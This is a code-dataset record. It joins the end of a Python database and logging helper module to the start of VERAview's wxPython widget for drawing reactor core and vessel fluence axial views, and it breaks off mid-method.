pendingentry = dblib.getsinglevalue(database, table, 'pending', condition=condition)
if pendingentry:
try:
pendingvaluelist = pendingentry.split(',')
except:
pendingvaluelist = []
if valuename in pendingvaluelist:
pass
else:
pendingvaluelist.append(valuename)
pendinglistentry = ','.join(pendingvaluelist)
dblib.setsinglevalue(database, table, 'pending', pendinglistentry, condition)
else:
utility.log(dirs.logs.control, "Set value: " + valuename + " not found in keywords", 4, loglevels.control)
# carry out original query no matter what
response = dblib.setsinglevalue(database, table, valuename, value, condition)
return response
def set_all_wal(wal=True):
db_paths = [
dirs.dbs.control,
dirs.dbs.log,
dirs.dbs.session,
dirs.dbs.recipe,
dirs.dbs.system,
dirs.dbs.motes,
dirs.dbs.info,
dirs.dbs.auths,
dirs.dbs.notifications,
dirs.dbs.safe,
dirs.dbs.users
]
for db_path in db_paths:
database = cupidDatabase(db_path)
database.set_wal_mode(wal)
def reload_log_config(**kwargs):
settings = {'quiet':False}
settings.update(kwargs)
logconfig_query_result = dbs.system.read_table_row('logconfig')[0]
logconfigdata = logconfig_query_result
loglevels.network = logconfigdata['network']
loglevels.io = logconfigdata['io']
loglevels.system = logconfigdata['system']
loglevels.control = logconfigdata['control']
loglevels.daemon = logconfigdata['daemon']
loglevels.serial = logconfigdata['serial']
loglevels.notifications = logconfigdata['notifications']
return logconfigdata
def set_debug():
print('** ENABLING DEBUG MODE **')
for attr, value in loglevels.__dict__.items():
setattr(loglevels, attr, 9)
for db_name in dirs.dbs.__dict__:
setattr(dbs, db_name, cupidDatabase(getattr(dirs.dbs, db_name), quiet=False))
# On import, Attempt to update from database. If we are unsuccessful, the above are defaults
try:
logconfig = reload_log_config(quiet=True)
except:
pass
else:
for key in logconfig:
try:
setattr(loglevels, key, logconfig[key])
except:
print ('Set attribute for "' + key + '" did not work')
def getdatameta(database, **kwargs):
settings = {
'get_time_span':True
}
settings.update(kwargs)
tablenames = dblib.gettablenames(database)
if 'metadata' in tablenames:
tablenames.remove('metadata')
queryarray = []
for tablename in tablenames:
queryarray.append("select count(*) from '" + tablename + "'")
results = dblib.sqlitemultquery(database, queryarray, **kwargs)['data']
meta = []
for result, tablename in zip(results, tablenames):
this_meta = {}
this_meta['tablename'] = tablename
this_meta['numpoints'] = result[0][0]
# Quick hacky way to know if this is an archive log or not
if tablename == 'data':
from os.path import split
db_name = split(database)[1]
types = table_name_to_type(db_name)
else:
types = table_name_to_type(tablename)
this_meta['type'] = types['type']
this_meta['subtype'] = types['subtype']
this_meta['id'] = types['id']
if settings['get_time_span']:
timespan = dblib.gettimespan(database, tablename)['seconds']
this_meta['timespan'] = timespan
meta.append(this_meta)
return meta
def get_and_set_logdb_metadata(database, **kwargs):
meta = getdatameta(database, **kwargs)
the_db = dblib.sqliteDatabase(database)
the_schema = dblib.sqliteTableSchema([
{'name':'tablename','primary':True},
{'name':'numpoints','type':'integer'},
{'name':'timespan','type':'real'},
{'name':'type'},
{'name':'subtype'},
{'name':'id'}
])
the_db.create_table('metadata', the_schema, dropexisting=True, queue=True)
for meta_item in meta:
the_db.insert('metadata', {'tablename':meta_item['tablename'], 'numpoints':meta_item['numpoints'],
'timespan':meta_item['timespan'], 'type':meta_item['type'],
'subtype':meta_item['subtype'], 'id':meta_item['id']}, queue=True)
the_db.execute_queue()
| 35.033806 | 182 | 0.61209 |
4a1f3fab0e0526b26e43b95b32bb7593ad9018b7 | 81,434 | py | Python | widget/vessel_core_axial_view.py | CASL/VERAview | 89b18f239ca5228185b80d5392068981d7733d3b | [
"BSD-3-Clause"
] | 7 | 2017-04-21T05:35:16.000Z | 2022-02-28T20:14:42.000Z | widget/vessel_core_axial_view.py | CASL/VERAview | 89b18f239ca5228185b80d5392068981d7733d3b | [
"BSD-3-Clause"
] | 2 | 2019-02-27T15:25:34.000Z | 2021-05-26T17:01:59.000Z | widget/vessel_core_axial_view.py | CASL/VERAview | 89b18f239ca5228185b80d5392068981d7733d3b | [
"BSD-3-Clause"
] | 3 | 2019-07-09T08:31:34.000Z | 2022-03-08T03:18:48.000Z | #!/usr/bin/env python
# $Id$
#------------------------------------------------------------------------
# NAME: vessel_core_axial_view.py -
# HISTORY: -
# 2019-01-18 [email protected] -
# Transition from tally to fluence.
# 2018-03-02 [email protected] -
# Migrating to _CreateEmptyBitmapAndDC().
# 2018-02-06 [email protected] -
# Fixing scaling issues.
# 2018-02-05 [email protected] -
# Moving Linux/GTK/X11 image manipulation to the UI thread.
# 2018-02-03 [email protected] -
# Starting in middle of assembly for quarter symmetry.
# 2018-01-09 [email protected] -
# Implementing core slice along azimuth.
# 2017-11-17 [email protected] -
# Migrating to wx.Bitmap instead of PIL.Image.
# 2017-09-22 [email protected] -
# Added theta_rad to the drawing state tuple.
# 2017-09-18 [email protected] -
# Fixed baffle draw in _DrawVesselComponents().
# Limited axial vessel vertical display to axialCoreDy (pixels).
# 2017-09-14 [email protected] -
# In LoadProps() converting tallyAddr[0] from a dict to a
# DataSetName instance.
# 2017-09-11 [email protected] -
#------------------------------------------------------------------------
import logging, math, os, sys, threading, time, timeit, traceback
import numpy as np
import pdb #pdb.set_trace()
try:
import wx
import wx.lib.delayedresult as wxlibdr
#from wx.lib.scrolledpanel import ScrolledPanel
except Exception:
raise ImportError( 'The wxPython module is required for this component' )
#try:
# import PIL.Image, PIL.ImageDraw, PIL.ImageFont
# #from PIL import Image, ImageDraw
#except Exception:
# raise ImportError, 'The Python Imaging Library (PIL) is required for this component'
from data.datamodel import *
from data.utils import *
from event.state import *
from .raster_widget import *
from .widget import *
_DEBUG_ = False
#PI_OVER_2 = math.pi / 2.0
#TWO_PI = math.pi * 2.0
#------------------------------------------------------------------------
# CLASS: VesselCoreAxial2DView -
#------------------------------------------------------------------------
class VesselCoreAxial2DView( RasterWidget ):
"""Pin-by-pin assembly view across axials and states.
21.6 * 8 = 172.8
vessel mod 187.96 ! barrel IR (cm)
ss 193.68 ! barrel OR (cm)
mod 219.15 ! vessel liner IR (cm)
ss 219.71 ! vessel liner OR / vessel IR (cm)
cs 241.70 ! vessel OR (cm)
pad ss 194.64 201.63 32 45 135 225 315 ! neutron pad ID,OD arc length
(degrees), and angular positions (degrees)
Properties:
"""
# -- Object Methods
# --
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView.__init__() -
#----------------------------------------------------------------------
def __init__( self, container, id = -1, **kwargs ):
"""
"""
self.angleSlider = None
self.assemblyAddr = ( -1, -1, -1 )
self.auxNodeAddrs = []
self.channelMode = False
self.fluenceAddr = FluenceAddress( radiusIndex = 0, thetaIndex = 0 )
self.nodalMode = False
self.nodeAddr = -1
self.subAddr = ( -1, -1 )
#self.vesselShowPad = True
# offsets in cm to edge given current cellRange
self.vesselOffset = [ 0, 0 ]
super( VesselCoreAxial2DView, self ).__init__( container, id )
#end __init__
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateAdditionalUIControls() -
#----------------------------------------------------------------------
def _CreateAdditionalUIControls( self ):
"""Creates a 'top' slider for selecting the view angle.
@return { 'top': panel }
"""
panel = wx.Panel( self )
label = wx.StaticText( panel, -1, 'Angle: ' )
self.angleSlider = wx.Slider(
panel, -1,
value = 0, minValue = 0, maxValue = 89,
pos = wx.DefaultPosition, size = ( -1, -1 ),
style = wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS
)
self.angleSlider.SetPageSize( 1 )
self.angleSlider.Bind( wx.EVT_SCROLL, self._OnAngleSlider )
sizer = wx.BoxSizer( wx.HORIZONTAL )
sizer.Add( label, 0, wx.ALL | wx.ALIGN_LEFT | wx.ALIGN_CENTER )
sizer.Add( self.angleSlider, 1, wx.ALL | wx.EXPAND, 4 )
panel.SetSizer( sizer )
return { 'top': panel }
#end _CreateAdditionalUIControls
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateClipboardData() -
#----------------------------------------------------------------------
def _CreateClipboardData( self, mode = 'displayed' ):
"""Retrieves the data for the state and axial.
@return text or None
"""
return \
self._CreateClipboardDisplayedData() if mode == 'displayed' else \
self._CreateClipboardSelectedData()
# self._CreateClipboardSelectionData() \
# if cur_selection_flag else \
# self._CreateClipboardAllData()
#end _CreateClipboardData
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateClipboardDisplayedData() -
#----------------------------------------------------------------------
def _CreateClipboardDisplayedData( self ):
"""Retrieves the data for the state and axial.
@return text or None
"""
csv_text = None
core = self.dmgr.core
dset = None
theta_ndx = self.fluenceAddr.thetaIndex
if theta_ndx >= 0:
dset = \
self.dmgr.GetH5DataSet( self.fluenceAddr.dataSetName, self.timeValue )
theta_ndx = min( theta_ndx, core.fluenceMesh.ntheta - 1 )
if dset is not None:
dset_array = np.array( dset )
ax_ranges = self._GetAxialRanges( 'fluence' )
r_start_ndx = self.config[ 'radiusStartIndex' ]
csv_text = '"%s: theta=%.3f; %s=%.3g"\n' % (
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName ),
core.fluenceMesh.theta[ theta_ndx ],
self.state.timeDataSet,
self.timeValue
)
csv_text += 'z,r,value\n'
#for ax in xrange( len( core.tally.z ) - 1, -1, -1 ):
for ax in xrange(
ax_ranges.get( 'fluence_top_ndx' ) - 1,
ax_ranges.get( 'fluence_bottom_ndx' ) - 1,
-1
):
for ri in xrange( r_start_ndx, core.fluenceMesh.nr ):
value = dset_array[ ax, theta_ndx, ri ]
row = '%.3f,%.3f,%.7g\n' % \
( core.fluenceMesh.z[ ax ], core.fluenceMesh.r[ ri ], value )
csv_text += row
#end for ri
#end for ax
#end if dset is not None and core is not None
return csv_text
#end _CreateClipboardDisplayedData
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateClipboardSelectedData() -
#----------------------------------------------------------------------
def _CreateClipboardSelectedData( self ):
"""Retrieves the data for the state, axial, and assembly.
@return text or None
"""
csv_text = None
core = self.dmgr.core
dset = None
theta_ndx = self.fluenceAddr.thetaIndex
z_ndx = self.axialValue.fluenceIndex
if z_ndx >= 0 and theta_ndx >= 0:
dset = \
self.dmgr.GetH5DataSet( self.fluenceAddr.dataSetName, self.timeValue )
core = self.dmgr.GetCore()
theta_ndx = min( theta_ndx, core.fluenceMesh.ntheta - 1 )
#z_ndx = min( z_ndx, core.fluenceMesh.nz - 1 )
z_ndx = min( z_ndx, core.fluenceMesh.nz - 2 )
if dset is not None and z_ndx >= 0:
dset_array = np.array( dset )
r_start_ndx = self.config[ 'radiusStartIndex' ]
csv_text = '"%s: axial=%.3f, theta=%.3f; %s=%.3g"\n' % (
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName ),
#self.axialValue.cm,
core.fluenceMesh.zcenters[ z_ndx ],
core.fluenceMesh.GetThetaRads( theta_ndx ),
self.state.timeDataSet,
self.timeValue
)
csv_text += 'r,value\n'
for ri in xrange( r_start_ndx, core.fluenceMesh.nr ):
value = dset_array[ z_ndx, theta_ndx, ri ]
row = '%.3f,%.7g\n' % ( core.fluenceMesh.r[ ri ], value )
csv_text += row
#end for ri
#end if dset is not None and core is not None
return csv_text
#end _CreateClipboardSelectedData
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateDrawConfig() -
#----------------------------------------------------------------------
def _CreateDrawConfig( self, **kwargs ):
"""Creates a draw configuration based on imposed 'size' (wd, ht ).
The technique is to determine the number of pixels per pin, with a minimum
of 1, meaning a forced scale might be necessary.
Keyword Args:
scale_type (str): 'linear' or 'log', defaulting to 'linear'
size (tuple(int)): ( wd, ht) against which to calculate the scale
fluence_scale_type (str): 'linear' or 'log', defaulting to 'linear'
Returns:
dict: keys (inherited from RasterWidget)
clientSize (tuple(int)): wd, ht
dataRange (tuple(float)):
( range_min, range_max, data_min, data_max )
font (wx.Font):
fontSize (int): font point size
labelFont (wx.Font):
labelSize (tuple(int)): wd, ht
legendBitmap (wx.Bitmap):
legendSize (tuple(int)): wd, ht
mapper (matplotlib.cm.ScalarMappable): used to convert values to
colors
valueFont (wx.Font):
(created here)
assemblyWidth (int): pixels required to draw an assembly
coreAxialDy (int): total of pixel offsets in y dimension for
core datasets
coreAxialLevelsDy (list(int)): list of pixel offsets in y dimension
for core datasets
coreAxialOffsetPix (int): vertical pixels for the core offset
coreRegion (list(int)): x, y, wd, ht
imageSize (tuple(int)): wd, ht
lineWidth (int): hilite line pixel width
npin (int): effective number of pins per assy for drawing
npinxCosTheta (float): effective (cos theta) pin columns per assy
npinySinTheta (float): effective (sin theta) pin rows per assy
pinCm (float): centimenters per pin
pinWidth (int): pixels to draw a pin
pixPerCm (float): non-integral pixels per centimeter
thetaCos (float): theta cosine
thetaRad (float): theta in radians
thetaSin (float): theta sine
valueFontSize (int): point size
vesselRegion (list(int)): x, y, wd, ht
(if fluence)
baffleWidth (int): pixel width for drawing the baffle
barrelRadius (int): pixel at which the baffle starts on the
top horizontal line
barrelWidth (int): pixel width for drawing the barrel
coreOffsetCm (float): offset to the start of the core in cm
fluenceDataRange (tuple(float)):
( range_min, range_max, data_min, data_max )
fluenceDataSetExpr (str): expression to apply when pulling data
based on a threshold
fleunceLegendBitmap (wx.Bitmap):
fluenceLegenSize (tuple(int)): wd, ht
fluenceMapper (matplotlib.cm.ScalarMappable): used to convert
values to colors
fluenceAxialDy (int): total of pixel offsets in y dimension for
fluence datasets
fluenceAxialLevelsDy (list(int)): list of pixel offsets in y
dimension for fluence datasets
fluenceAxialOffsetPix (int): vertical pixels for the vessel offset,
should be 0
linerRadius (int): pixel at which the liner starts on the
top horizontal line
linerWidth (int): pixel width for drawing the liner
padAngles (list(float)): pad start angles in degrees
padArc (float): pad arc in degrees
padRadius (int): pixel at which the pad would start on the
top horizontal line
padWidth (int): pixel width for drawing the pad
radiusStartIndex (int): 0-based index in the radius array at which
to start drawing
thetaStopIndex (int): 0-based exclusive index
vesselRadius (int): pixel at which the vessel ends on the
top horizontal line
"""
ds_range = self._ResolveDataRange(
self.curDataSet,
self.timeValue if self.state.scaleMode == 'state' else -1,
apply_custom_range = False
)
kwargs[ 'colormap_name' ] = 'jet'
if 'scale_type' not in kwargs:
kwargs[ 'scale_type' ] = self.dmgr.GetDataSetScaleType( self.curDataSet )
config = self._CreateBaseDrawConfig( ds_range, **kwargs )
core = self.dmgr.GetCore()
font_size = config[ 'fontSize' ]
label_size = config[ 'labelSize' ]
#legend_bmap = config[ 'legendBitmap' ]
legend_size = config[ 'legendSize' ]
# -- Calc axial_mesh range and cm/pin
# --
#axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet )
#top_mesh_level = min( self.cellRange[ 3 ] - 1, len( axial_mesh ) - 1 )
#could never happen
#if top_mesh_level == self.cellRange[ 1 ]:
# axial_range_cm = axial_mesh[ -1 ] - axial_mesh[ 0 ]
# Note, if we ever allow zooming, we must call _GetAxialRanges() to
# account for cellRange, so we might as well do it now
ax_ranges = self._GetAxialRanges( 'core', 'fluence' )
axial_mesh = self.dmgr.GetAxialMesh2( mesh_type = 'all' )
axial_range_cm = ax_ranges[ 'cm_top' ] - ax_ranges[ 'cm_bottom' ]
if axial_range_cm == 0.0:
axial_range_cm = 1.0
# -- Core axial offset
core_axial_mesh = self.dmgr.GetAxialMesh2( self.curDataSet, 'pin' )
core_axial_offset_cm = axial_mesh[ -1 ] - core_axial_mesh[ -1 ]
core_axial_range_cm = \
core_axial_mesh[ ax_ranges[ 'core_top_ndx' ] ] - \
core_axial_mesh[ ax_ranges[ 'core_bottom_ndx' ] ]
fluence_axial_offset_cm = 0.0
fluence_axial_range_cm = 1.0
# -- Calc values based on theta
vessel_geom = core.vesselGeom
fluence_mesh = core.fluenceMesh
theta_rad = fluence_mesh.GetThetaRads( self.fluenceAddr.thetaIndex )
theta_cos = math.cos( theta_rad )
theta_sin = math.sin( theta_rad )
npinx_cos_theta = theta_cos * core.npinx
npiny_sin_theta = theta_sin * core.npiny
#npin = core.npin
npin = max( core.npinx, core.npiny )
if self.channelMode:
npin += 1
cm_per_pin = core.apitch / npin
# -- Calc axial pin equivalents
axial_pin_equivs = axial_range_cm / cm_per_pin
horz_pin_equivs = npin
core_aspect_ratio = core.apitch * self.cellRange[ -2 ] / axial_range_cm
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'theta_rad=%f, npin=%d, apitch=%f, ' +
'cm_per_pin=%f, axial_pin_equivs=%f',
theta_rad, npin, core.apitch, cm_per_pin, axial_pin_equivs
)
# -- Vessel stuff
# --
radius_start_ndx = 1
fluence_ds_expr = fluence_ds_range = fluence_legend_bmap = None
fluence_legend_size = ( 0, 0 )
theta_stop_ndx = fluence_mesh.ntheta
core_offset_cm = 0.0
vessel_wd_cm = core_wd_cm = self.cellRange[ -2 ] * core.apitch
if vessel_geom is not None and fluence_mesh.IsValid() and \
self.fluenceAddr.dataSetName is not None:
fluence_axial_mesh = \
self.dmgr.GetAxialMesh2( self.fluenceAddr.dataSetName, 'fluence' )
fluence_axial_offset_cm = axial_mesh[ -1 ] - fluence_axial_mesh[ -1 ]
fluence_axial_range_cm = \
fluence_axial_mesh[ ax_ranges[ 'fluence_top_ndx' ] ] - \
fluence_axial_mesh[ ax_ranges[ 'fluence_bottom_ndx' ] ]
# rndx = DataUtils.FindListIndex( fluence_mesh.r, vessel_geom.linerOuter )
# if rndx > 1:
# radius_start_ndx = min( rndx, fluence_mesh.nr - 1 )
radius_start_ndx = fluence_mesh.FindRadiusStartIndex( vessel_geom )
# if core.coreSym == 4:
# tndx = DataUtils.FindListIndex( fluence_mesh.theta, PI_OVER_2 )
# if fluence_mesh.theta[ tndx ] == PI_OVER_2:
# tndx -= 1
# theta_stop_ndx = min( tndx + 1, fluence_mesh.ntheta )
theta_stop_ndx = fluence_mesh.FindThetaStopIndex( core.coreSym )
fluence_ds_expr = '[:,:%d,%d:]' % ( theta_stop_ndx, radius_start_ndx )
fluence_ds_range = self._ResolveDataRange(
self.fluenceAddr.dataSetName,
self.timeValue if self.state.scaleMode == 'state' else -1,
ds_expr = fluence_ds_expr
)
if 'fluence_scale_type' in kwargs:
fluence_scale_type = kwargs[ 'fluence_scale_type' ]
else:
fluence_scale_type = \
self._ResolveScaleType( self.fluenceAddr.dataSetName )
if fluence_scale_type == 'log':
fluence_ds_range = self.dmgr.NormalizeLogRange( fluence_ds_range )
norm = colors.LogNorm(
vmin = fluence_ds_range[ 0 ], vmax = fluence_ds_range[ 1 ],
clip = True
)
else:
norm = colors.Normalize(
vmin = fluence_ds_range[ 0 ], vmax = fluence_ds_range[ 1 ],
clip = True
)
fluence_mapper = cm.ScalarMappable(
norm = norm,
cmap = cm.get_cmap( self.colormapName )
)
if self.showLegend:
fluence_ds_name = \
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName )
ndx = fluence_ds_name.find( '/' )
if ndx >= 0:
fluence_ds_name = fluence_ds_name[ ndx + 1 : ]
fluence_legend_bmap = self._CreateLegendBitmap(
fluence_ds_range,
font_size = font_size,
mapper = fluence_mapper,
ntick_values = 8,
scale_type = fluence_scale_type,
title = fluence_ds_name
)
fluence_legend_size = \
( fluence_legend_bmap.GetWidth(), fluence_legend_bmap.GetHeight() )
#end if self.showLegend
if core.coreSym == 4 and max( core.nassx, core.nassy ) % 2 == 1:
core_offset_cm = 0.5 * core.apitch
vessel_wd_cm = max(
core_offset_cm + core_wd_cm + vessel_geom.vesselOuterOffset,
fluence_mesh.r[ -1 ]
)
horz_pin_equivs = vessel_wd_cm / cm_per_pin
#end if vessel_geom and fluence_mesh
# -- Scale to widget size?
# --
if 'clientSize' in config:
wd, ht = config[ 'clientSize' ]
# -- Determine drawable region
# --
# l2r label : core : (baffle 1 px) : font-sp : legend : fluence_legend
# t2b label : core : (baffle 1 px) : font-sp : title
#xxxxx revisit font_size, pt bigger than a pixel
region_wd = \
wd - label_size[ 0 ] - 2 - (font_size << 1) - \
legend_size[ 0 ] - fluence_legend_size[ 0 ]
working_ht = max( ht, legend_size[ 1 ], fluence_legend_size[ 1 ] )
region_ht = working_ht - label_size[ 1 ] - 2 - (font_size << 1)
region_aspect_ratio = float( region_wd ) / float( region_ht )
# -- Limited by height
#x if region_aspect_ratio > core_aspect_ratio:
#y if self.fitMode == 'ht':
#y pin_wd = max( 1, int( math.floor( region_ht / axial_pin_equivs ) ) )
#y pin_wd = min( 10, pin_wd )
# -- Limited by width
#y else:
#y pin_wd = max( 1, int( math.floor( region_wd / horz_pin_equivs ) ) )
pix_per_cm_x = float( region_wd ) / vessel_wd_cm
pix_per_cm_y = float( region_ht ) / axial_range_cm
if self.fitMode == 'ht':
pix_per_pin = math.floor( pix_per_cm_y * cm_per_pin )
#pix_per_pin = math.floor( min( pix_per_cm_x, pix_per_cm_y ) * cm_per_pin )
else:
pix_per_pin = math.floor( pix_per_cm_x * cm_per_pin )
#pix_per_pin = math.ceil( min( pix_per_cm_x, pix_per_cm_y ) * cm_per_pin )
pin_wd = pix_per_pin = min( 10, max( 1, int( pix_per_pin ) ) )
else: #deprecated
pin_wd = pix_per_pin = \
int( kwargs[ 'scale' ] ) if 'scale' in kwargs else 4
#font_size = self._CalcFontSize( 1024 * pix_per_pin )
# -- Pixels per cm, assembly width, core and vessel size
# --
pix_per_cm = pix_per_pin / cm_per_pin
assy_wd = npin * pix_per_pin
#x core_wd is cm_per_pin * self.cellRange[ -2 ] * npin * pix_per_cm_x
core_wd = self.cellRange[ -2 ] * assy_wd
core_ht = int( math.ceil( core_axial_range_cm * pix_per_cm ) )
#int( math.ceil( pix_per_cm * (axial_range_cm - core_axial_offset_cm) ) )
vessel_wd = int( math.ceil( pix_per_cm * vessel_wd_cm ) )
vessel_ht = int( math.ceil( pix_per_cm * fluence_axial_range_cm ) )
core_axial_offset_pix = \
0 if core_axial_offset_cm == 0.0 else \
int( math.floor( core_axial_offset_cm * pix_per_cm ) )
fluence_axial_offset_pix = \
0 if fluence_axial_offset_cm == 0.0 else \
int( math.floor( fluence_axial_offset_cm * pix_per_cm ) )
# -- Calc image size
# --
region_x = label_size[ 0 ] + 2
region_y = label_size[ 1 ] + 2
image_wd = \
region_x + vessel_wd + (font_size << 1) + \
legend_size[ 0 ] + fluence_legend_size[ 0 ]
image_ht = \
max( region_y + vessel_ht, legend_size[ 1 ], fluence_legend_size[ 1 ] ) + \
(font_size << 2)
# -- Create list of axial levels
# --
core_axials_dy = []
#for ax in range( self.cellRange[ 3 ] - 1, self.cellRange[ 1 ] - 1, -1 ):
for ax in xrange(
ax_ranges[ 'core_top_ndx' ] - 1, ax_ranges[ 'core_bottom_ndx' ] - 1, -1
):
ax_cm = core_axial_mesh[ ax + 1 ] - core_axial_mesh[ ax ]
dy = int( math.floor( pix_per_cm * ax_cm ) )
core_axials_dy.insert( 0, dy )
#end for ax
core_axial_dy = sum( core_axials_dy )
fluence_axial_dy = 0
fluence_axials_dy = []
if fluence_ds_range is not None:
for ax in range(
ax_ranges[ 'fluence_top_ndx' ] - 1,
ax_ranges[ 'fluence_bottom_ndx' ] - 1,
-1
):
ax_cm = fluence_axial_mesh[ ax + 1 ] - fluence_axial_mesh[ ax ]
dy = int( math.floor( pix_per_cm * ax_cm ) )
fluence_axials_dy.insert( 0, dy )
fluence_axial_dy = sum( fluence_axials_dy )
# -- Create config dict
# --
config[ 'assemblyWidth' ] = assy_wd
config[ 'coreAxialDy' ] = core_axial_dy
config[ 'coreAxialLevelsDy' ] = core_axials_dy
config[ 'coreAxialOffsetPix' ] = core_axial_offset_pix
config[ 'coreRegion' ] = [
region_x, region_y + core_axial_offset_pix,
core_wd, core_ht
]
#[ label_size[ 0 ] + 2, label_size[ 1 ] + 2, core_wd, core_ht ]
config[ 'imageSize' ] = ( image_wd, image_ht )
config[ 'lineWidth' ] = \
max( 1, min( int( assy_wd / 20.0 ), max( core_axials_dy ) >> 1, 5 ) )
#max( 1, min( 5, int( assy_wd / 20.0 ) ) )
config[ 'npin' ] = npin
config[ 'npinxCosTheta' ] = npinx_cos_theta
config[ 'npinySinTheta' ] = npiny_sin_theta
config[ 'pinCm' ] = cm_per_pin
config[ 'pinWidth' ] = pin_wd
config[ 'pixPerCm' ] = pix_per_cm
config[ 'thetaCos' ] = theta_cos
config[ 'thetaRad' ] = theta_rad
config[ 'thetaSin' ] = theta_sin
config[ 'valueFontSize' ] = assy_wd >> 1
config[ 'vesselRegion' ] = [ region_x, region_y, vessel_wd, vessel_ht ]
if self.nodalMode:
config[ 'nodeWidth' ] = assy_wd >> 1
if fluence_ds_range is not None:
baffle_wd = \
max( 1, int( math.ceil( vessel_geom.baffleSize * pix_per_cm ) ) )
barrel_r = int( math.ceil( vessel_geom.barrelInner * pix_per_cm ) )
barrel_wd = max( 1, int( vessel_geom.barrelSize * pix_per_cm ) )
liner_r = int( math.ceil( vessel_geom.linerInner * pix_per_cm ) )
liner_wd = max( 1, int( vessel_geom.linerSize * pix_per_cm ) )
pad_r = int( math.ceil( vessel_geom.padInner * pix_per_cm ) )
pad_wd = \
0 if vessel_geom.padSize <= 0 else \
max( 1, int( vessel_geom.padSize * pix_per_cm ) )
vessel_r = int( math.ceil( vessel_geom.vesselOuter * pix_per_cm ) )
config[ 'baffleWidth' ] = baffle_wd
config[ 'barrelRadius' ] = barrel_r
config[ 'barrelWidth' ] = barrel_wd
config[ 'coreOffsetCm' ] = core_offset_cm
config[ 'linerRadius' ] = liner_r
config[ 'linerWidth' ] = liner_wd
config[ 'padAngles' ] = vessel_geom.padAngles # DEF_pad_angles_deg
config[ 'padArc' ] = vessel_geom.padArc # DEF_pad_len_deg
config[ 'padRadius' ] = pad_r
config[ 'padWidth' ] = pad_wd
# We're suspending this with the new fluence data
config[ 'radiusStartIndex' ] = radius_start_ndx
# config[ 'radiusStartIndex' ] = 0
config[ 'fluenceAxialDy' ] = fluence_axial_dy
config[ 'fluenceAxialLevelsDy' ] = fluence_axials_dy
config[ 'fluenceAxialOffsetPix' ] = fluence_axial_offset_pix
config[ 'fluenceDataRange' ] = fluence_ds_range
config[ 'fluenceDataSetExpr' ] = fluence_ds_expr
config[ 'fluenceMapper' ] = fluence_mapper
config[ 'thetaStopIndex' ] = theta_stop_ndx
config[ 'vesselRadius' ] = vessel_r
if self.showLegend:
config[ 'fluenceLegendBitmap' ] = fluence_legend_bmap
config[ 'fluenceLegendSize' ] = fluence_legend_size
#end if fluence_mesh
return config
#end _CreateDrawConfig
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateMenuDef() -
#----------------------------------------------------------------------
def _CreateMenuDef( self ):
"""
"""
menu_def = super( VesselCoreAxial2DView, self )._CreateMenuDef()
new_menu_def = \
[ x for x in menu_def if x.get( 'label' ) != 'Unzoom' ]
return new_menu_def
#end _CreateMenuDef
#----------------------------------------------------------------------
# METHOD: VesselCoreAxial2DView._CreateRasterImage() -
#----------------------------------------------------------------------
def _CreateRasterImage( self, tuple_in, config = None ):
"""Called in background task to create the PIL image for the state.
@param tuple_in 0-based ( state_index, assy_col_or_row, pin_col_or_row,
theta_rad )
@param config optional config to use instead of self.config
"""
#start_time = timeit.default_timer()
state_ndx = tuple_in[ 0 ]
node_addr = self.dmgr.GetNodeAddr( self.subAddr )
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug( 'tuple_in=%s', str( tuple_in ) )
bmap = None
core = dset = None
if config is None:
config = self.config
if config is not None and self.dmgr.HasData():
dset = self.dmgr.GetH5DataSet( self.curDataSet, self.timeValue )
core = self.dmgr.GetCore()
#x config[ 'coreOffsetY' ] = core_offset_y_cm * pix_per_cm
if dset is not None and core is not None:
assy_wd = config[ 'assemblyWidth' ]
axial_levels_dy = config[ 'coreAxialLevelsDy' ]
core_axial_offset_pix = config[ 'coreAxialOffsetPix' ]
core_offset_cm = config.get( 'coreOffsetCm', 0 )
core_region = config[ 'coreRegion' ]
font = config[ 'font' ]
font_size = config[ 'fontSize' ]
im_wd, im_ht = config[ 'imageSize' ]
label_font = config[ 'labelFont' ]
legend_bmap = config[ 'legendBitmap' ]
legend_size = config[ 'legendSize' ]
mapper = config[ 'mapper' ]
if self.nodalMode:
node_wd = config[ 'nodeWidth' ]
npin = config[ 'npin' ]
npinx_cos_theta = config[ 'npinxCosTheta' ]
npiny_sin_theta = config[ 'npinySinTheta' ]
pin_wd = config[ 'pinWidth' ]
pix_per_cm = config[ 'pixPerCm' ]
fluence_ds_range = config.get( 'fluenceDataRange' )
fluence_legend_bmap = config.get( 'fluenceLegendBitmap' )
fluence_legend_size = config.get( 'fluenceLegendSize' )
theta_cos = config.get( 'thetaCos' )
theta_rad = config.get( 'thetaRad' )
theta_sin = config.get( 'thetaSin' )
value_font = config[ 'valueFont' ]
value_font_size = config[ 'valueFontSize' ]
vessel_region = config[ 'vesselRegion' ]
fluence_mesh = core.fluenceMesh
ds_range = config[ 'dataRange' ]
value_delta = ds_range[ 1 ] - ds_range[ 0 ]
# -- "Item" refers to channel or pin
item_factors = None
if self.state.weightsMode == 'on':
item_factors = self.dmgr.GetFactors( self.curDataSet )
dset_array = np.array( dset )
dset_shape = dset.shape
# -- Total pins, effectively
if core_offset_cm > 0:
pin_eff_count = self.cellRange[ -2 ] * npin - (npin >> 1)
else:
pin_eff_count = self.cellRange[ -2 ] * npin
if self.logger.isEnabledFor( logging.DEBUG ):
self.logger.debug(
'core_region=%s, vessel_region=%s\n' +
'core.npinx=%d, core.npiny=%d\n' +
'npinx_cos_theta=%f, npiny_sin_theta=%f\n' +
'npin=%d, pin_eff_count=%d',
str( core_region ), str( vessel_region ),
core.npinx, core.npiny, npinx_cos_theta, npiny_sin_theta,
npin, pin_eff_count
)
# -- Create title template
addresses = None
if fluence_ds_range is not None:
addresses = \
' {0:s} th={1:d}deg'.format(
self.dmgr.GetDataSetDisplayName( self.fluenceAddr.dataSetName ),
int( theta_rad * 180.0 / math.pi )
